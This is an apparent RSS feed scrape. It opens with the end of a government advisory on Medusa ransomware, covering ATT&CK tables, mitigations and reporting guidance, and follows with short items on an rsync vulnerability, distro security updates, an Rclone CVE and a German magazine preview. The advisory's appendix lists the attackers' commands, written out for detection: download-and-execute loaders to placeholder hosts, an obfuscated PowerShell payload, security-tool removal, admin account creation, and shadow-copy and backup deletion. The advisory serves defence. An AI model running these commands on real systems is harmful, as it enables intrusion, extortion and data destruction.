<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 8: Exfiltration and Encryption</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title </th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration</td>
<td><a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration ">TA0010</a></td>
<td>Medusa actors identified files to exfiltrate out of victim networks.</td>
</tr>
<tr>
<td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a></td>
<td>Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 9: Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ingress Tool Transfer</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></td>
<td>Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress.</td>
</tr>
<tr>
<td>Application Layer Protocol: Web Protocols </td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols ">T1071.001</a></td>
<td>Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port <code>443</code>: HTTPS.</td>
</tr>
<tr>
<td>Remote Access Software</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software ">T1219</a></td>
<td>Medusa actors used remote access software to move laterally through the network.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 10: Persistence</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Create Account</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1136/002/" title="Create Account">T1136.002</a></td>
<td>Medusa actors created a domain account to maintain access to victim systems.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 11: Impact</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact ">T1486</a></td>
<td>Medusa identified and encrypted data on target systems to interrupt availability to system and network resources.</td>
</tr>
<tr>
<td>Inhibit System Recovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a></td>
<td>The process <code>gaze.exe</code> terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note.</td>
</tr>
<tr>
<td>Financial Theft</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1657/" title="Financial Theft ">T1657</a></td>
<td>Victims must pay to decrypt files and prevent further release by Medusa actors.</td>
</tr>
<tr>
<td>System Shutdown/Reboot</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1529/" title="System Shutdown/Reboot">T1529</a></td>
<td>Medusa actors manually turned off and encrypted virtual machines.</td>
</tr>
<tr>
<td>Service Stop</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1489/" title="Service Stop">T1489</a></td>
<td>The process <code>gaze.exe</code> terminates all services related to backups, security, databases, communication, file sharing, and websites,</td>
</tr>
</tbody>
</table>
</div>
<h2><strong>Mitigations</strong></h2>
<p>FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cpg" title="Cross-Sector Cybersecurity Performance Goals">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="Network Segmentation">CPG 2.F</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="System Backups">2.R</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#IncidentResponseIRPlans2S" title="Incident Response (IR) Plans">2.S</a>].</li>
<li><strong>Require all accounts</strong> with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#UniqueCredentials2C" title="Unique Credentials">CPG 2.C</a>].</li>
<li><strong>Require multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA)">CPG 2.H</a>].</li>
<li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MitigatingKnownVulnerabilities1E" title="Mitigating Known Vulnerabilities ">CPG 1.E</a>].</li>
<li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="Network Segmentation">CPG 2.F</a>].</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs">CPG 3.A</a>].</li>
<li><strong>Require VPNs or Jump Hosts for remote access.</strong></li>
<li><strong>Monitor for unauthorized scanning and access attempts.</strong></li>
<li><strong>Filter network traffic</strong> by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts">CPG 2.E</a>].</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#AssetInventory1A" title="Asset Inventory">CPG 1.A</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DocumentDeviceConfigurations2O" title="Document Device Configurations">2.O</a>].</li>
<li><strong>Disable command-line and scripting activities and permissions.</strong> Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts ">CPG 2.E</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DisableMacrosbyDefault2N" title="Disable Macros by Default">2.N</a>].</li>
<li><strong>Disable unused ports</strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#ProhibitConnectionofUnauthorizedDevices2V" title="Prohibit Connection of Unauthorized Devices">CPG 2.V</a>].</li>
<li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="System Backups">CPG 2.R</a>]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data.</li>
<li><strong>Ensure all backup data is encrypted, immutable</strong> (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#StrongandAgileEncryption2K" title="Strong and Agile Encryption ">CPG 2.K</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SecureSensitiveData2L" title="Secure Sensitive Data">2.L</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SystemBackups2R" title="System Backups">2.R</a>].</li>
</ul>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (<strong>Table 3</strong> to <strong>Table 11</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<ul>
<li>Joint <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="#StopRansomware Guide">#StopRansomware Guide</a>.</li>
<li>Joint Guide <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a>.</li>
<li>Joint <a href="https://www.cisa.gov/resources-tools/resources/guide-securing-remote-access-software" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a>.</li>
</ul>
<h2><strong>Reporting</strong></h2>
<p>Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s <a href="https://www.ic3.gov/Home/ComplaintChoice">Internet Crime Complaint Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/report">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov">report@cisa.gov</a>) or by calling 1-844-Say-CISA (1-844-729-2472).</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, and MS-ISAC.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>ConnectWise contributed to this advisory.</p>
<h2><strong>Version History</strong></h2>
<p><strong>March 12, 2025:</strong> Initial version.</p>
<h2><strong>Appendix A: Medusa Commands</strong></h2>
<p>These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.</p>
<table>
<tbody>
<tr>
<td>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.css &lt;localfile&gt;.dll</td>
</tr>
<tr>
<td>cmd.exe /c certutil -f urlcache https://&lt;domain&gt;/&lt;remotefile&gt;.msi &lt;localfile&gt;.msi</td>
</tr>
<tr>
<td>cmd.exe /c driverquery</td>
</tr>
<tr>
<td>cmd.exe /c echo Computer: %COMPUTERNAME% &amp; `<br>echo Username: %USERNAME% &amp; `<br>echo Domain: %USERDOMAIN% &amp; `<br>echo Logon Server: %LOGONSERVER% &amp; `<br>echo DNS Domain: %USERDNSDOMAIN% &amp; `<br>echo User Profile: %USERPROFILE% &amp; echo `<br>System Root: %SYSTEMROOT%</td>
</tr>
<tr>
<td>cmd.exe /c ipconfig /all [<a href="https://attack.mitre.org/versions/v16/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>]</td>
</tr>
<tr>
<td>cmd.exe /c net share [<a href="https://attack.mitre.org/versions/v16/techniques/T1135/" title="Network Share Discovery">T1135</a>]</td>
</tr>
<tr>
<td>cmd.exe /c net use</td>
</tr>
<tr>
<td>cmd.exe /c netstat -a</td>
</tr>
<tr>
<td>cmd.exe /c sc query</td>
</tr>
<tr>
<td>cmd.exe /c schtasks</td>
</tr>
<tr>
<td>cmd.exe /c systeminfo [<a href="https://attack.mitre.org/versions/v16/techniques/T1082/" title="System Information Discovery">T1082</a>]</td>
</tr>
<tr>
<td>cmd.exe /c ver</td>
</tr>
<tr>
<td>cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname</td>
</tr>
<tr>
<td>cmd.exe /c wmic printjob</td>
</tr>
<tr>
<td>mmc.exe compmgmt.msc /computer:{hostname/ip}</td>
</tr>
<tr>
<td>mstsc.exe /v:{hostname/ip}</td>
</tr>
<tr>
<td>mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}</td>
</tr>
<tr>
<td>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</td>
</tr>
<tr>
<td>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RMM tool&gt;.msi)</td>
</tr>
<tr>
<td>
<p>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((</p>
<p>New-Object System.IO.StreamReader(</p>
<p>New-Object System.IO.Compression.GzipStream((</p>
<p>New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(</p>
<p>(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;',</p>
<p>'&lt;character replacement 1&gt;','&lt;character replacement 2&gt;')))),</p>
<p>[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</p>
</td>
</tr>
<tr>
<td>powershell Remove-Item (Get-PSReadlineOption).HistorySavePath</td>
</tr>
<tr>
<td>
<p>powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,</p>
<p>logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path &lt;file path&gt; </p>
<p>-NoTypeInformation -Encoding UTF8</p>
</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} "c:\windows\system32\taskkill.exe" /f /im WRSA.exe</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c   "c:\gaze.exe"</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c  "copy \\ad02\sysvol\gaze.exe c:\gaze.exe</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c  "copy \\ad02\sysvol\gaze.exe c:\gaze.exe &amp;&amp; c:\gaze.exe"</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat</td>
</tr>
<tr>
<td>psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat</td>
</tr>
<tr>
<td>nltest /dclist:</td>
</tr>
<tr>
<td>net group "domain admins" /domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a>]</td>
</tr>
<tr>
<td>net group "Domain Admins" default /add /domain</td>
</tr>
<tr>
<td>net group "Enterprise Admins" default /add /domain</td>
</tr>
<tr>
<td>net group "Remote Desktop Users" default /add /domain</td>
</tr>
<tr>
<td>net group "Group Policy Creator Owners" default /add /domain</td>
</tr>
<tr>
<td>net group "Schema Admins" default /add /domain</td>
</tr>
<tr>
<td>net group "domain users" /domain</td>
</tr>
<tr>
<td>net user default /active:yes /domain</td>
</tr>
<tr>
<td>net user /add default &lt;password&gt; /domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a>]</td>
</tr>
<tr>
<td>query user</td>
</tr>
<tr>
<td>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0</td>
</tr>
<tr>
<td>systeminfo</td>
</tr>
<tr>
<td>vssadmin.exe Delete Shadows /all /quiet</td>
</tr>
<tr>
<td>vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded</td>
</tr>
<tr>
<td>del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk</td>
</tr>
<tr>
<td>netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</td>
</tr>
<tr>
<td>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes</td>
</tr>
<tr>
<td>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multiple Vulnerabilities in Rsync Could Allow for Remote Code Execution]]></title>
<description><![CDATA[Multiple vulnerabilities have been discovered in Rsync, the most severe of which could allow for remote code execution. Rsync is an open-source file synchronization and data transferring tool valued for its ability to perform incremental transfers, reducing data transfer times and bandwidth usage...]]></description>
<link>https://tsecurity.de/de/2554751/sicherheitsluecken/multiple-vulnerabilities-in-rsync-could-allow-for-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2554751/sicherheitsluecken/multiple-vulnerabilities-in-rsync-could-allow-for-remote-code-execution/</guid>
<pubDate>Thu, 16 Jan 2025 00:21:50 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Multiple vulnerabilities have been discovered in Rsync, the most severe of which could allow for remote code execution. Rsync is an open-source file synchronization and data transferring tool valued for its ability to perform incremental transfers, reducing data transfer times and bandwidth usage. The tool is utilized extensively by backup systems like Rclone, DeltaCopy, ChronoSync, public file distribution repositories, and cloud and server management operations. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution in the context of the system. Depending on the privileges associated with the system, an attacker could then install programs; view, change, or delete data. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (rsync), Debian (rsync), Fedora (perl-Net-OAuth and redis), Red Hat (ipa, raptor2, rsync, and tuned), Slackware (rsync), SUSE (apache2-mod_jk, git, kernel, rclone, rsync, and webkit2gtk3), and Ubuntu (git, linux-azure-5.4, pdns, pdns-recursor, pytho...]]></description>
<link>https://tsecurity.de/de/2553714/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2553714/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 15 Jan 2025 15:23:52 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (rsync), <b>Debian</b> (rsync), <b>Fedora</b> (perl-Net-OAuth and redis), <b>Red Hat</b> (ipa, raptor2, rsync, and tuned), <b>Slackware</b> (rsync), <b>SUSE</b> (apache2-mod_jk, git, kernel, rclone, rsync, and webkit2gtk3), and <b>Ubuntu</b> (git, linux-azure-5.4, pdns, pdns-recursor, python-django, rlottie, and rsync).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Arch Linux (rsync), Debian (rsync), Fedora (perl-Net-OAuth and redis), Red Hat (ipa, raptor2, rsync, and tuned), Slackware (rsync), SUSE (apache2-mod_jk, git, kernel, rclone, rsync, and webkit2gtk3), and Ubuntu (git, linux-azure-5.4, pdns, pdns-recursor, pytho...]]></description>
<link>https://tsecurity.de/de/2553715/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2553715/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 15 Jan 2025 15:23:52 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Arch Linux</b> (rsync), <b>Debian</b> (rsync), <b>Fedora</b> (perl-Net-OAuth and redis), <b>Red Hat</b> (ipa, raptor2, rsync, and tuned), <b>Slackware</b> (rsync), <b>SUSE</b> (apache2-mod_jk, git, kernel, rclone, rsync, and webkit2gtk3), and <b>Ubuntu</b> (git, linux-azure-5.4, pdns, pdns-recursor, python-django, rlottie, and rsync).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel, NetworkManager, and thunderbird), Fedora (golang-github-aws-sdk-2, golang-github-aws-smithy, golang-github-ncw-swift-2, rclone, and thunderbird), Mageia (ceph, firefox, and thunderbird), Oracle (kernel, NetworkManager, and thunderbird), Red ...]]></description>
<link>https://tsecurity.de/de/2551617/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2551617/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 14 Jan 2025 17:37:45 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel, NetworkManager, and thunderbird), <b>Fedora</b> (golang-github-aws-sdk-2, golang-github-aws-smithy, golang-github-ncw-swift-2, rclone, and thunderbird), <b>Mageia</b> (ceph, firefox, and thunderbird), <b>Oracle</b> (kernel, NetworkManager, and thunderbird), <b>Red Hat</b> (fence-agents and raptor2), <b>SUSE</b> (dpdk, firefox, frr, grafana, operator-sdk, perl-Module-ScanDeps, proftpd, python311-mistune, redis, thunderbird, valkey, and yq), and <b>Ubuntu</b> (hplip and webkit2gtk).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-52522 | Rclone up to 1.68.1 permissions (GHSA-hrxh-9w67-g4cv / Nessus ID 214053)]]></title>
<description><![CDATA[A vulnerability was found in Rclone up to 1.68.1 and classified as critical. This issue affects some unknown processing. The manipulation leads to preservation of permissions.

The identification of this vulnerability is CVE-2024-52522. It is possible to launch the attack on the local host. There...]]></description>
<link>https://tsecurity.de/de/2551512/sicherheitsluecken/cve-2024-52522-rclone-up-to-1681-permissions-ghsa-hrxh-9w67-g4cv-nessus-id-214053/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2551512/sicherheitsluecken/cve-2024-52522-rclone-up-to-1681-permissions-ghsa-hrxh-9w67-g4cv-nessus-id-214053/</guid>
<pubDate>Tue, 14 Jan 2025 16:51:11 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.rclone">Rclone up to 1.68.1</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This issue affects some unknown processing. The manipulation leads to preservation of permissions.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.284819">CVE-2024-52522</a>. It is possible to launch the attack on the local host. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[LinuxWelt 1/2025 am Kiosk: Das bringt Linux im Jahr 2025]]></title>
<description><![CDATA[In unserem Special Sicher im Netzwerk: Router – WLAN – Browser – VPN geht es um die Sicherheit Ihres Heimnetzes, um sicheren Zugang zum Internet, um die Abwehr von Eindringlingen und Schadprogrammen. Auch Methoden für optimalen Datenschutz kommen zu Wort. Das und vieles mehr lesen Sie in der neue...]]></description>
<link>https://tsecurity.de/de/2469557/it-nachrichten/linuxwelt-12025-am-kiosk-das-bringt-linux-im-jahr-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2469557/it-nachrichten/linuxwelt-12025-am-kiosk-das-bringt-linux-im-jahr-2025/</guid>
<pubDate>Fri, 29 Nov 2024 11:00:40 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In unserem Special Sicher im Netzwerk: Router – WLAN – Browser – VPN geht es um die Sicherheit Ihres Heimnetzes, um sicheren Zugang zum Internet, um die Abwehr von Eindringlingen und Schadprogrammen. Auch Methoden für optimalen Datenschutz kommen zu Wort. Das und vieles mehr lesen Sie in der neuen LinuxWelt 1/2025 – jetzt am Kiosk oder bequem im PC-WELT-Shop bestellen!</p>



<h2 class="wp-block-heading">Eine Auswahl der Themen in der neuen LinuxWelt: </h2>



<h2 class="wp-block-heading">Grundlagen</h2>



<ul class="wp-block-list">
<li><strong>Heft-Specials &amp; Heft-DVD.</strong> Die Highlights dieser Ausgabe: Zwei Netzwerk-Specials, Praxisanleitungen und Heft-DVD</li>



<li><strong>Die Heft-DVD.</strong> Alle Inhalte der DVD im Überblick: Distributionen, Boottools, Software &amp; LinuxWelt-Jahrgang 2024</li>



<li><strong>Distributionen auf DVD.</strong> Kurzvorstellungen zu Ubuntu Mate, Fedora 21 und MX Linux</li>



<li><strong>Linux-News.</strong> Linux, Open Source und IT-Sicherheit: Die Trends der letzten Wochen</li>



<li><strong>Die E-Rechnung kommt!</strong> 2025 startet die Aufbewahrungspflicht – 2026 wird es anstrengender</li>



<li><strong>2025: Das wird relevant.</strong> Hardware, Distributionen, Desktops: Das erwartet uns im nächsten Jahr</li>
</ul>



<h2 class="wp-block-heading">Special I – Sicher im Netzwerk: Router – WLAN – Browser – VPN</h2>



<ul class="wp-block-list">
<li><strong>Sichere Router.</strong> Alle Sicherheitsfunktionen: So schützt der Router Ihr Heimnetz</li>



<li><strong>Isolierte Gastnetze.</strong> Gast- und Zweitnetze: So halten Sie LAN- und WLAN-Geräte vom primären Netzwerk fern</li>



